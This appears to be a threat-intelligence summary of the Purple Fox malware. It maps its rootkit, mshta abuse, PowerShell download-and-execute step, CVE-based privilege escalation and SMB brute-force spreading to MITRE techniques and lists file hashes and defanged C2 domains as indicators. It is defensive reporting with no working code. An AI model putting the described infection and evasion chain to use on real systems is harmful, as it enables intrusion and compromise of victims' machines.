eSentire Threat Intelligence Malware Analysis: Purple Fox

Purple Fox malware evolved from an exploit kit used by RIG EK into an independent threat that deploys a multi-stage, stealthy infection chain featuring a rootkit, LOLBIN abuse, and privilege escalation via public CVEs. The analysis maps observed behaviors to MITRE techniques, lists IOCs, and provides defensive recommendations including patching, threat hunting, and detections across endpoints and networks. Hashtags: #PurpleFox #RIG_EK #mshta #PowerShell #SMB #CVE-2020-0674 #M0071cab #ret6bcus

Keypoints

Purple Fox uses rootkit components to evade detections by hiding registry keys and files on the infected machine.
The malware abuses LOLBIN (Living Off the Land Binary), specifically mshta.exe, to execute malicious commands and defeat defenses.
Purple Fox leverages multiple publicly available exploits to obtain privilege escalation on the host (e.g., CVEs 2019-0808, 2018-8120, 2015-1701, 2021-1675, and 2020-0674).
eSentire TRU assesses with medium/high confidence links to Chinese threat actors and a focus on blocking reinfection via firewall policies.
The malware shows worm-like behavior by brute-forcing SMB credentials to propagate to other reachable hosts.
The drop/install chain involves a CAB/MSI-based payload delivery (M0071.cab) and registry-based persistence, with a hidden rootkit service injected into svchost.

MITRE Techniques

[T1014] Rootkit – Rootkit components hide artifacts by masking registry keys and files on the infected machine. ‘rootkit components to avoid detections by hiding registry keys and files on the infected machine.’
[T1218] Signed Binary Proxy Execution – Mshta.exe is used to proxy execute malicious content. “Mshta.exe is often abused by threat actor(s) to proxy execute malicious .hta files, Javascript, or PowerShell via VBScript.”
[T1059.001] PowerShell – A base64-encoded PowerShell one-line command is spawned from a vulnerable IE instance to download and execute payloads. “launching a Base64-encoded PowerShell one-line command (Exhibit 1).”
[T1105] Ingress Tool Transfer – The command downloads and launches i.php from a C2 domain. “downloading and launching the file i.php from a command and control (C2) domain.”
[T1027] Obfuscated/Encoded Files and Information – The script uses XOR encoding and Base64-encoded payloads to conceal the content. “contents of i.php file contain the char codes that are XOR’ed (XOR or ‘exclusive or’ is a logical operator) with the hexadecimal value 0x26” and “The script contains multiple Base64-encoded payloads.”
[T1112] Modify Registry – The malware modifies registry values (e.g., HKCU:Software7-Zip) to confirm payload execution. “checks the registry for the value ‘StayOnTop’ under the mentioned registry path.”
[T1021.002] Remote Services: SMB – Worm-like propagation via SMB brute-forcing to reach other reachable machines. “SMB brute-forcing to gain access to other machines that are publicly exposed on the Internet.”
[T1055] Process Injection – The rootkit DLL is injected into svchost.exe to maintain persistence and execution. “Ms5C864EC6App.dll gets injected into svchost processes…”
[T1071.004] Application Layer Protocol: DNS – C2 communications and DNS resolution for command and control. “DNS resolver domain ret.6bc[.]us”

Indicators of Compromise

[Hash] i.php – 32d81dcfcf7ae1d000fd9332b3442eb4afa72674dda5bd0cb47c1faaa44c99b8
[Hash] MSI Installer – 61ea42af8d93e9d6eee269c048983559f455a82ac387b3e08046cbe21a05ca64
[Hash] M0071.cab – 42d20b11fef9c5beba6c6dbcc4d3bbd2d163bc4d50035d3604461a9c25b69e70
[Hash] .log – 29c94fb2f3f0a3dc731854d27527f45a85d6b8658fb88e218954f5c76a93e270
[Hash] dbcode86mk.log – 766d7995bc515cb656e91581e57217f1f745ba3136dd32ff12cf915521b129ad
[Domain] hxxps[:]//kjt[.]bar/ – C2
[Hash] Ms5C864EC6App.dll – 682e2ab27c4c773abfd2056625cb9fe60a78039ea009e0a83fc6d0ba18b0db6d
[Domain] ret.6bc[.]us – DNS resolver domain for C2

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print